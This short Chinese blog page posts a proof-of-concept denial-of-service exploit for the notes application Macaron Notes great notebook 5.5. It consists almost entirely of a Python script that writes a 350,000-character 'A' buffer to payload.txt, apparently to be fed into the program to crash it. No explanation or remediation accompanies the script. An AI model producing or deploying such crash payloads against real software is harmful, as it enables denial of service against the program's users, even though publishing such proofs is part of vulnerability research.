Macaron_Notes_great_notebook_5.5_拒絕服務漏洞

# Macaron Notes great notebook 5.5 拒絕服務漏洞
==POC==

#!/usr/bin/env python
buffer = "\x41" * 350000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容